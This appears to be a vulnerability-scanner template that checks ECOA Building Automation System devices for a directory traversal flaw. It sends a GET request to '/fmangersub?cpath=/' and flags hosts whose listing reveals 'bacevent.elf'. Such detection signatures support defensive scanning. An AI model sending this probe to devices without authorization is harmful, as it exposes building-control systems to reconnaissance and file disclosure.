name:
  - " ECOA Building Automation System - Directory Traversal Content Disclosure"
url:
  - "/fmangersub?cpath=/"
method:
  - "GET"
data:
  - ""
matchers:
  - Status:
      - 200
  - Regex:
      - "bacevent.elf"